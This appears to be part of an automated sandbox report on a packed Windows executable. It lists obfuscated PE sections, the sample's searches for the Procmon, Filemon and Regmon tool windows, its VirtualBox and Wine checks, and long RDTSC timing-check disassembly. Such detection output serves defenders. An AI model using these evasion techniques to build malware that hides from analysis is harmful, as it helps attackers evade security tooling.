        Source: Slides.lnk.3.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
        Source: Docs.lnk.3.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
        Source: Window RecorderWindow detected: More than 3 window changes detected
        Source: file.exeStatic file information: File size 1836032 > 1048576
        Source: file.exeStatic PE information: Raw size of bfltexda is bigger than: 0x100000 < 0x196600
        Source: Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: file.exe, 00000000.00000003.2361037563.00000000085C0000.00000004.00001000.00020000.00000000.sdmp

        Data Obfuscation

        barindex
        Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.560000.0.unpack :EW;.rsrc:W;.idata :W; :EW;bfltexda:EW;eysgebwh:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;bfltexda:EW;eysgebwh:EW;.taggant:EW;
        Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
        Source: file.exeStatic PE information: real checksum: 0x1c9c08 should be: 0x1cc2b3
        Source: file.exeStatic PE information: section name:
        Source: file.exeStatic PE information: section name: .idata
        Source: file.exeStatic PE information: section name:
        Source: file.exeStatic PE information: section name: bfltexda
        Source: file.exeStatic PE information: section name: eysgebwh
        Source: file.exeStatic PE information: section name: .taggant
        Source: C:\Users\user\Desktop\file.exeCode function: 0_3_0130CC32 push ds; retf 0_3_0130CCB5
        Source: C:\Users\user\Desktop\file.exeCode function: 0_3_0130E52B push 543EA35Fh; mov dword ptr [esp], edi0_3_0130E5C5
        Source: C:\Users\user\Desktop\file.exeCode function: 0_3_0130E52B push 0CF473ADh; mov dword ptr [esp], edx0_3_0130E5E5
        Source: C:\Users\user\Desktop\file.exeCode function: 0_3_0130E52B push ebp; mov dword ptr [esp], ebx0_3_0130E620
        Source: C:\Users\user\Desktop\file.exeCode function: 0_3_0130E52B push ebp; mov dword ptr [esp], ecx0_3_0130E649
        Source: C:\Users\user\Desktop\file.exeCode function: 0_3_012FC803 push FFFFFFDBh; iretd 0_3_012FC814
        Source: C:\Users\user\Desktop\file.exeCode function: 0_3_0130E87C push edi; mov dword ptr [esp], 65257F99h0_3_0130E9E7
        Source: C:\Users\user\Desktop\file.exeCode function: 0_3_0130E87C push edx; mov dword ptr [esp], ecx0_3_0130E9FA
        Source: C:\Users\user\Desktop\file.exeCode function: 0_3_0130CAB9 push ds; retf 0_3_0130CCB5
        Source: C:\Users\user\Desktop\file.exeCode function: 0_3_0130E5A9 push 543EA35Fh; mov dword ptr [esp], edi0_3_0130E5C5
        Source: C:\Users\user\Desktop\file.exeCode function: 0_3_0130E5A9 push 0CF473ADh; mov dword ptr [esp], edx0_3_0130E5E5
        Source: C:\Users\user\Desktop\file.exeCode function: 0_3_0130E5A9 push ebp; mov dword ptr [esp], ebx0_3_0130E620
        Source: C:\Users\user\Desktop\file.exeCode function: 0_3_0130E5A9 push ebp; mov dword ptr [esp], ecx0_3_0130E649
        Source: C:\Users\user\Desktop\file.exeCode function: 0_3_0130E595 push 543EA35Fh; mov dword ptr [esp], edi0_3_0130E5C5
        Source: C:\Users\user\Desktop\file.exeCode function: 0_3_0130E595 push 0CF473ADh; mov dword ptr [esp], edx0_3_0130E5E5
        Source: C:\Users\user\Desktop\file.exeCode function: 0_3_0130E595 push ebp; mov dword ptr [esp], ebx0_3_0130E620
        Source: C:\Users\user\Desktop\file.exeCode function: 0_3_0130E595 push ebp; mov dword ptr [esp], ecx0_3_0130E649
        Source: C:\Users\user\Desktop\file.exeCode function: 0_3_012FCC81 push esi; retf 0_3_012FCC84
        Source: C:\Users\user\Desktop\file.exeCode function: 0_3_0130E9E5 push edx; mov dword ptr [esp], ecx0_3_0130E9FA
        Source: C:\Users\user\Desktop\file.exeCode function: 0_3_012AC670 push E00127F0h; retf 0_3_012AC675
        Source: C:\Users\user\Desktop\file.exeCode function: 0_3_012AC670 push E00127F0h; retf 0_3_012AC675
        Source: C:\Users\user\Desktop\file.exeCode function: 0_3_012AC670 push E00127F0h; retf 0_3_012AC675
        Source: C:\Users\user\Desktop\file.exeCode function: 0_3_012AC670 push E00127F0h; retf 0_3_012AC675
        Source: file.exeStatic PE information: section name: entropy: 7.981874278944832
        Source: file.exeStatic PE information: section name: bfltexda entropy: 7.954899185569

        Boot Survival

        barindex
        Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
        Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
        Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
        Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
        Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
        Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonclassJump to behavior
        Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonclassJump to behavior
        Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
        Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
        Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
        Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
        Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
        Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
        Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonclassJump to behavior
        Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonclassJump to behavior
        Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnkJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnkJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnkJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnkJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnkJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnkJump to behavior
        Source: C:\Users\user\Desktop\file.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
        Source: C:\Users\user\Desktop\file.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

        Malware Analysis System Evasion

        barindex
        Source: C:\Users\user\Desktop\file.exeSystem information queried: FirmwareTableInformationJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5BD02A second address: 5BC8C8 instructions: 0x00000000 rdtsc 0x00000002 je 00007FA1CCF9D8CCh 0x00000008 jmp 00007FA1CCF9D8C6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov dword ptr [esp], eax 0x00000012 jns 00007FA1CCF9D8B7h 0x00000018 push dword ptr [ebp+122D005Dh] 0x0000001e sub dword ptr [ebp+122D1B1Ah], edi 0x00000024 call dword ptr [ebp+122D1CDAh] 0x0000002a pushad 0x0000002b stc 0x0000002c xor eax, eax 0x0000002e jmp 00007FA1CCF9D8C5h 0x00000033 mov edx, dword ptr [esp+28h] 0x00000037 pushad 0x00000038 add ecx, dword ptr [ebp+122D34F8h] 0x0000003e and di, 9230h 0x00000043 popad 0x00000044 mov dword ptr [ebp+122D36E4h], eax 0x0000004a mov dword ptr [ebp+122D2B6Bh], edi 0x00000050 mov esi, 0000003Ch 0x00000055 mov dword ptr [ebp+122D2B6Bh], edi 0x0000005b add esi, dword ptr [esp+24h] 0x0000005f pushad 0x00000060 mov ebx, dword ptr [ebp+122D3788h] 0x00000066 mov ah, 97h 0x00000068 popad 0x00000069 lodsw 0x0000006b xor dword ptr [ebp+122D2B6Bh], eax 0x00000071 add eax, dword ptr [esp+24h] 0x00000075 clc 0x00000076 mov ebx, dword ptr [esp+24h] 0x0000007a mov dword ptr [ebp+122D2B6Bh], edx 0x00000080 push eax 0x00000081 push eax 0x00000082 push edx 0x00000083 jmp 00007FA1CCF9D8C5h 0x00000088 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5BC8C8 second address: 5BC8CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5BC8CE second address: 5BC8D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72EF55 second address: 72EF5A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72EF5A second address: 72EF60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72E1DA second address: 72E1DF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72E34C second address: 72E350 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72E350 second address: 72E359 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72E359 second address: 72E382 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push ebx 0x00000008 jbe 00007FA1CCF9D8B6h 0x0000000e pushad 0x0000000f popad 0x00000010 pop ebx 0x00000011 popad 0x00000012 push ebx 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FA1CCF9D8C4h 0x0000001a rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72E382 second address: 72E392 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FA1CCCD2146h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72E62F second address: 72E634 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72E7F7 second address: 72E7FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72E7FD second address: 72E801 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72E801 second address: 72E805 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72E805 second address: 72E80E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 732556 second address: 73255A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73255A second address: 732560 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7325DC second address: 7325E6 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FA1CCCD2146h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7325E6 second address: 7325EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7325EC second address: 732691 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push ebx 0x0000000b push eax 0x0000000c pop eax 0x0000000d pop ebx 0x0000000e push eax 0x0000000f jmp 00007FA1CCCD2156h 0x00000014 pop eax 0x00000015 popad 0x00000016 nop 0x00000017 mov dword ptr [ebp+122D29A0h], edi 0x0000001d sub edi, dword ptr [ebp+122D351Ch] 0x00000023 push 00000000h 0x00000025 push 00000000h 0x00000027 push eax 0x00000028 call 00007FA1CCCD2148h 0x0000002d pop eax 0x0000002e mov dword ptr [esp+04h], eax 0x00000032 add dword ptr [esp+04h], 0000001Ch 0x0000003a inc eax 0x0000003b push eax 0x0000003c ret 0x0000003d pop eax 0x0000003e ret 0x0000003f jne 00007FA1CCCD2153h 0x00000045 jnl 00007FA1CCCD215Fh 0x0000004b call 00007FA1CCCD2149h 0x00000050 push eax 0x00000051 push edx 0x00000052 pushad 0x00000053 ja 00007FA1CCCD2146h 0x00000059 je 00007FA1CCCD2146h 0x0000005f popad 0x00000060 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 732691 second address: 7326AC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FA1CCF9D8C6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7326AC second address: 73270B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 push esi 0x0000000a pushad 0x0000000b popad 0x0000000c pop esi 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 jmp 00007FA1CCCD2151h 0x00000015 popad 0x00000016 popad 0x00000017 mov eax, dword ptr [esp+04h] 0x0000001b push esi 0x0000001c push ecx 0x0000001d push ebx 0x0000001e pop ebx 0x0000001f pop ecx 0x00000020 pop esi 0x00000021 mov eax, dword ptr [eax] 0x00000023 jnc 00007FA1CCCD2154h 0x00000029 mov dword ptr [esp+04h], eax 0x0000002d pushad 0x0000002e pushad 0x0000002f jmp 00007FA1CCCD2154h 0x00000034 push eax 0x00000035 push edx 0x00000036 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73270B second address: 732782 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push esi 0x00000007 pop esi 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a popad 0x0000000b popad 0x0000000c pop eax 0x0000000d mov edi, dword ptr [ebp+122D3598h] 0x00000013 push 00000003h 0x00000015 mov ecx, esi 0x00000017 push 00000000h 0x00000019 mov edx, dword ptr [ebp+122D35ACh] 0x0000001f push 00000003h 0x00000021 push 00000000h 0x00000023 push ecx 0x00000024 call 00007FA1CCF9D8B8h 0x00000029 pop ecx 0x0000002a mov dword ptr [esp+04h], ecx 0x0000002e add dword ptr [esp+04h], 0000001Dh 0x00000036 inc ecx 0x00000037 push ecx 0x00000038 ret 0x00000039 pop ecx 0x0000003a ret 0x0000003b mov edi, 4890C731h 0x00000040 add dword ptr [ebp+122D2B6Bh], edx 0x00000046 call 00007FA1CCF9D8B9h 0x0000004b push edx 0x0000004c js 00007FA1CCF9D8BCh 0x00000052 js 00007FA1CCF9D8B6h 0x00000058 pop edx 0x00000059 push eax 0x0000005a push eax 0x0000005b push edx 0x0000005c jo 00007FA1CCF9D8BCh 0x00000062 je 00007FA1CCF9D8B6h 0x00000068 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 732782 second address: 7327C5 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FA1CCCD2148h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e jmp 00007FA1CCCD2156h 0x00000013 mov eax, dword ptr [eax] 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FA1CCCD2159h 0x0000001c rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73286E second address: 732874 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 732874 second address: 7328A3 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FA1CCCD2148h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f xor dword ptr [ebp+122D2F2Bh], edi 0x00000015 push 00000000h 0x00000017 mov edi, dword ptr [ebp+122D350Ch] 0x0000001d push E7AB9DF2h 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007FA1CCCD214Bh 0x00000029 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 732984 second address: 7329CF instructions: 0x00000000 rdtsc 0x00000002 jne 00007FA1CCF9D8B8h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f sub dword ptr [ebp+122D31F5h], eax 0x00000015 push 00000000h 0x00000017 push 00000000h 0x00000019 push esi 0x0000001a call 00007FA1CCF9D8B8h 0x0000001f pop esi 0x00000020 mov dword ptr [esp+04h], esi 0x00000024 add dword ptr [esp+04h], 0000001Ah 0x0000002c inc esi 0x0000002d push esi 0x0000002e ret 0x0000002f pop esi 0x00000030 ret 0x00000031 push 7F5EAE27h 0x00000036 pushad 0x00000037 ja 00007FA1CCF9D8B8h 0x0000003d push eax 0x0000003e push edx 0x0000003f pushad 0x00000040 popad 0x00000041 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7329CF second address: 732A78 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xor dword ptr [esp], 7F5EAEA7h 0x0000000e mov esi, 1988CA01h 0x00000013 push 00000003h 0x00000015 push 00000000h 0x00000017 push eax 0x00000018 call 00007FA1CCCD2148h 0x0000001d pop eax 0x0000001e mov dword ptr [esp+04h], eax 0x00000022 add dword ptr [esp+04h], 00000015h 0x0000002a inc eax 0x0000002b push eax 0x0000002c ret 0x0000002d pop eax 0x0000002e ret 0x0000002f mov di, BCF1h 0x00000033 mov dword ptr [ebp+122D2565h], esi 0x00000039 push 00000000h 0x0000003b mov edx, ebx 0x0000003d push 00000003h 0x0000003f push 00000000h 0x00000041 push esi 0x00000042 call 00007FA1CCCD2148h 0x00000047 pop esi 0x00000048 mov dword ptr [esp+04h], esi 0x0000004c add dword ptr [esp+04h], 0000001Ah 0x00000054 inc esi 0x00000055 push esi 0x00000056 ret 0x00000057 pop esi 0x00000058 ret 0x00000059 or dword ptr [ebp+122D2869h], edi 0x0000005f mov dword ptr [ebp+122D1B1Ah], edx 0x00000065 call 00007FA1CCCD2149h 0x0000006a jno 00007FA1CCCD2166h 0x00000070 push eax 0x00000071 pushad 0x00000072 push eax 0x00000073 push edx 0x00000074 jns 00007FA1CCCD2146h 0x0000007a rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 732A78 second address: 732A96 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1CCF9D8C6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 732A96 second address: 732A9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 732A9A second address: 732A9E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 732A9E second address: 732AC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b je 00007FA1CCCD214Eh 0x00000011 jo 00007FA1CCCD2148h 0x00000017 push ecx 0x00000018 pop ecx 0x00000019 mov eax, dword ptr [eax] 0x0000001b push edi 0x0000001c push edi 0x0000001d push edi 0x0000001e pop edi 0x0000001f pop edi 0x00000020 pop edi 0x00000021 mov dword ptr [esp+04h], eax 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 732AC8 second address: 732ACF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 732ACF second address: 732AD4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74369F second address: 7436A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007FA1CCF9D8B6h 0x0000000a rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7436A9 second address: 7436AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 753B51 second address: 753B62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jno 00007FA1CCF9D8B6h 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71DC11 second address: 71DC16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71DC16 second address: 71DC1C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71DC1C second address: 71DC20 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71DC20 second address: 71DC38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA1CCF9D8BAh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jnp 00007FA1CCF9D8B6h 0x00000013 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 751A4D second address: 751A99 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007FA1CCCD2146h 0x00000009 jmp 00007FA1CCCD2151h 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 jnc 00007FA1CCCD2155h 0x00000019 pop edx 0x0000001a pop eax 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 popad 0x00000021 jmp 00007FA1CCCD2150h 0x00000026 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 751A99 second address: 751A9D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 751A9D second address: 751AB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA1CCCD214Dh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 751AB0 second address: 751AB6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 751AB6 second address: 751ABC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 751ABC second address: 751AC0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 751D69 second address: 751D7B instructions: 0x00000000 rdtsc 0x00000002 jc 00007FA1CCCD2146h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c je 00007FA1CCCD2146h 0x00000012 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 751EC1 second address: 751EC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 751EC5 second address: 751EC9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 751EC9 second address: 751ED3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 751ED3 second address: 751EDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FA1CCCD2146h 0x0000000a rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 751EDD second address: 751EEA instructions: 0x00000000 rdtsc 0x00000002 je 00007FA1CCF9D8B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 751EEA second address: 751EF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75202B second address: 75203A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push esi 0x00000006 pop esi 0x00000007 jg 00007FA1CCF9D8B6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
